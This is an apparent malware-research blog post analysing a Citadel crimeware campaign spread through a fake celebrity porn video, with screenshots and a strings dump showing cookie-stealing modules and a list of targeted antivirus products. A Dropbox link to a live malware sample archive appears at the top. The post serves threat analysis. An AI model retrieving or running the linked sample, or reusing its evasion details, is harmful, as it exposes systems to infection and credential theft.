<span style="font-family: Arial, Helvetica, sans-serif;">Sample: https://www.dropbox.com/s/oubxld1jbo2e4f8/facebook%20malware%2012-11-14.rar</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-43125498424795216282014-08-23T10:49:00.000-07:002014-08-23T10:49:35.153-07:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>Citadel is back: Fake </b><span class="ecxEstilo4" style="background-color: white; color: #444444; line-height: 28.399999618530273px; text-align: -webkit-center;"><span class="ecxEstilo3" style="font-weight: bold;">Porn Video of Greisy Ulloa and comedian Edwin Sierra</span></span></span><span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15.199999809265137px; line-height: 21.299999237060547px; text-align: -webkit-center;"> </span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Arial, Helvetica, sans-serif;">It had been a while since I last came across a new campaign of the Citadel crimeware. Just as we have seen in <a href="http://oberheimdmx.blogspot.com.ar/search?q=citadel">previous</a> installments, social engineering is used to trap the unwary. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3fnhhjaURfmhouHnGCtw3XL6ImslRsQt98Gwq8rDPIeSA3BgR5u_Da3ERcDg4zeEpSZ4-cN5CgiRyHm6ZtweFfhPXz293pO5PQfloz8lTT7q9riJdQc_GpGDTJeYrsdWjbo-hNVifgv4/s1600/fk01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3fnhhjaURfmhouHnGCtw3XL6ImslRsQt98Gwq8rDPIeSA3BgR5u_Da3ERcDg4zeEpSZ4-cN5CgiRyHm6ZtweFfhPXz293pO5PQfloz8lTT7q9riJdQc_GpGDTJeYrsdWjbo-hNVifgv4/s1600/fk01.jpg" height="320" width="298" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhM1k5R6n5DQMdmUrgkO05Q34aJqp8U82alc9d6JgvhBBteG5vI-IupHFikCNC9pScL6UNzy3MpU5fZpDkJwbAte3mOLDfzKOQ6TBEkc6MzJDjJ7RV8ms7ThN3Ly_lj375ApUirBrDLk/s1600/fk02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhM1k5R6n5DQMdmUrgkO05Q34aJqp8U82alc9d6JgvhBBteG5vI-IupHFikCNC9pScL6UNzy3MpU5fZpDkJwbAte3mOLDfzKOQ6TBEkc6MzJDjJ7RV8ms7ThN3Ly_lj375ApUirBrDLk/s1600/fk02.jpg" height="303" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Download of the executable file.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrI8jn-YqM2hvZpWiYsUgRvUqk4WCH_n28LzNsiHlvsRc_pIVhPsIeuz4rLacDI8JR9LClymo9w_QTFa20C-wZS30XCRTGSL9S0XvfWchGtWK1mO_6JOoPEgUVpJryw71eHLpWKmGKUxs/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrI8jn-YqM2hvZpWiYsUgRvUqk4WCH_n28LzNsiHlvsRc_pIVhPsIeuz4rLacDI8JR9LClymo9w_QTFa20C-wZS30XCRTGSL9S0XvfWchGtWK1mO_6JOoPEgUVpJryw71eHLpWKmGKUxs/s1600/03.jpg" height="233" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The threat's icon, which looks like a video player.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_myh-J3L80zCvJAp7ux6lRKgenu2wQHVhAemGHijmIaH9rsGzpQEqLNjno6jh2wcsQ4D6GXK3t7gb4SPRlP3YGGYFMIkqQo7Xfplu_200tgRx3NhkznquwFNfa9A2blXgDOlwRpv5SyM/s1600/icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_myh-J3L80zCvJAp7ux6lRKgenu2wQHVhAemGHijmIaH9rsGzpQEqLNjno6jh2wcsQ4D6GXK3t7gb4SPRlP3YGGYFMIkqQo7Xfplu_200tgRx3NhkznquwFNfa9A2blXgDOlwRpv5SyM/s1600/icon.png" height="320" width="258" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analysis on V.T.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iMnFgK0epMIkDVtSXq2mAWUy1SS2vYLJTvKRbGu7CAWqthh7IWUmhjW7u01LE_kbuQtrLjIO6tpB17ArIhRmpJjOoXJEATGiVBo-P_S7b_3icZg9CJWJSxG6W0RPDygN-KmzvgHRVP4/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iMnFgK0epMIkDVtSXq2mAWUy1SS2vYLJTvKRbGu7CAWqthh7IWUmhjW7u01LE_kbuQtrLjIO6tpB17ArIhRmpJjOoXJEATGiVBo-P_S7b_3icZg9CJWJSxG6W0RPDygN-KmzvgHRVP4/s1600/vt1.jpg" height="112" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">It is wrapped with a Visual Basic crypter.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBn7h8-K5b6MILxZ4GNOMsb2HEj_OHb2XOb-3yLxV8n79PWsN-LZCOgD0YNGCaqEl0qiG6cyi-_c9s9H-CQeAn7jKXJl2HcdSQhAt-PPWn-Ek73vxx4C6Rp2o4ImE9PCyANElYpqyH8ck/s1600/isdp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBn7h8-K5b6MILxZ4GNOMsb2HEj_OHb2XOb-3yLxV8n79PWsN-LZCOgD0YNGCaqEl0qiG6cyi-_c9s9H-CQeAn7jKXJl2HcdSQhAt-PPWn-Ek73vxx4C6Rp2o4ImE9PCyANElYpqyH8ck/s1600/isdp.png" height="286" width="320" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Here in the dump, a string referring to the well-known researcher <a href="http://krebsonsecurity.com/">Brian Krebs</a>.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-Sd_V7607oaDUkGmXT7-6BqCl3IIlfUn5H5bSktBz7soMHKT2wbWjAQF7IjsnenjZnan-2LLe7CyV-zzmxvhITySFy0XzOgAWZSHiH7BNnAZ8ZjTXtnIpWFcm4ZlHZnADLQ634NOovQ/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-Sd_V7607oaDUkGmXT7-6BqCl3IIlfUn5H5bSktBz7soMHKT2wbWjAQF7IjsnenjZnan-2LLe7CyV-zzmxvhITySFy0XzOgAWZSHiH7BNnAZ8ZjTXtnIpWFcm4ZlHZnADLQ634NOovQ/s1600/04.png" height="323" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Strings</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1E0 ASCII "GET ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1E8 ASCII "POST ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1F0 ASCII "FAIL",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1F8 ASCII ".swf",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A200 ASCII ".flv",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A208 ASCII "facebook.com",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A21C ASCII "%BOTID%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A224 ASCII "%BOTNET%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A230 ASCII "%BC-*-*-*-*%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A240 ASCII "%VIDEO%",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A248 ASCII "Cookie: %s</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C50 ASCII "api",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C54 ASCII "cmd",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C58 ASCII "C1F20D2340B51905"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C68 ASCII "6A7D89B7DF4B0FFF"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C78 ASCII 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C7C UNICODE ".exe",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C88 ASCII "update.exe",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401C9C ASCII "config.bin",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026A0 UNICODE "ll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026A8 ASCII "cookie_module",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026B8 ASCII "cit_ffcookie.mod"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026C8 ASCII "ule",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026CC ASCII "video_module",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004026DC ASCII "cit_video.module"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D80 DD Dumped9.00409F98 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D84 DD Dumped9.00409F70 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D88 DD Dumped9.00409F44 UNICODE "Microsoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D8C DD Dumped9.00409F24 UNICODE "ESET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D90 DD Dumped9.00409F04 UNICODE "ESET"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D94 DD Dumped9.00409EE8 UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D98 DD Dumped9.00409ECC UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403D9C DD Dumped9.00409EB0 UNICODE "AVG"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA0 DD Dumped9.00409E8C UNICODE "AntiVir"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA4 DD Dumped9.00409E68 UNICODE "avast!"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DA8 DD Dumped9.00409E3C UNICODE "Kaspersky"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DAC DD Dumped9.00409E14 UNICODE "Kaspersky"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB0 DD Dumped9.00409DEC UNICODE "Norton"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB4 DD Dumped9.00409DC4 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB8 DD Dumped9.00409DA0 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DBC DD Dumped9.00409D74 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC0 DD Dumped9.00409D50 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC4 DD Dumped9.00409D20 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC8 DD Dumped9.00409CF0 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DCC DD Dumped9.00409CE0 UNICODE "McAfee"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DD0 DD Dumped9.00409CB8 UNICODE "SafenSoft"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C64 UNICODE "ComSpec",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C74 ASCII "Mozilla/4.0 (com"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C84 ASCII "patible; MSIE 7."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407C94 ASCII "0; Windows NT 5."</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CA4 ASCII "1; SV1)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CAC ASCII "POST",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CB4 ASCII "GET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CB8 ASCII "Connection: clos"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CC8 ASCII "e</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CCC ASCII "urlmon.dll",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CD8 ASCII "ObtainUserAgentS"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CE8 ASCII "tring",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D08 UNICODE "S:(ML;;N"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D18 UNICODE "RNWNX;;;"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D28 UNICODE "LW)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D30 UNICODE "SeSecuri"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D40 UNICODE "tyPrivil"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D50 UNICODE "ege",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D58 UNICODE "S:(ML;CI"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D68 UNICODE "OI;NRNWN"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407D78 UNICODE "X;;;LW)",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DEC ASCII "wxz",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DF0 ASCII "aeiouy",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407DF8 UNICODE "Global\",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407E08 UNICODE "Local\",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409C50 ASCII "GAEZ",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409C74 ASCII "71:> &2",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CB8 UNICODE "SafenSof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CC8 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CCC UNICODE "SysWatch"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CDC UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CE0 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CF0 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CFE UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D0E UNICODE " Center",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D20 UNICODE "McAfee",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D2E UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D3E UNICODE "Center",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D50 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D60 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D62 UNICODE "Client",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D74 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D84 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D86 UNICODE "Protecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409D96 UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DA0 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DB0 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DB2 UNICODE "Shared",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DC4 UNICODE "Symantec"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DD4 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DD6 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DE6 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DEC UNICODE "Norton",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409DFA UNICODE "Protecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E0A UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E14 UNICODE "Kaspersk"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E24 UNICODE "y",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E28 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E38 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E3C UNICODE "Kaspersk"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E4C UNICODE "y",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E50 UNICODE "Anti-Vir"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E60 UNICODE "us",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E68 UNICODE "avast!",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E76 UNICODE "Antiviru"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E86 UNICODE "s",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E8C UNICODE "AntiVir",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E9C UNICODE "Desktop",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409EB8 UNICODE "Monitor",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409ED4 UNICODE "Service",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409EF0 UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F00 UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F04 UNICODE "ESET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F0E UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F1E UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F24 UNICODE "ESET",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F2E UNICODE "Antiviru"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F3E UNICODE "s",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F44 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F54 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F58 UNICODE "Inspecti"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F68 UNICODE "on",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F70 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F80 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F84 UNICODE "Malware",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409F98 UNICODE "Microsof"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FA8 UNICODE "t",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FAC UNICODE "Security"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FBC UNICODE 0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FC0 ASCII "GetProcAddress",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FD0 ASCII "LoadLibraryA",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FE0 ASCII "NtCreateThread",0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409FF0 ASCII "NtCreateUserProc"</span></div>
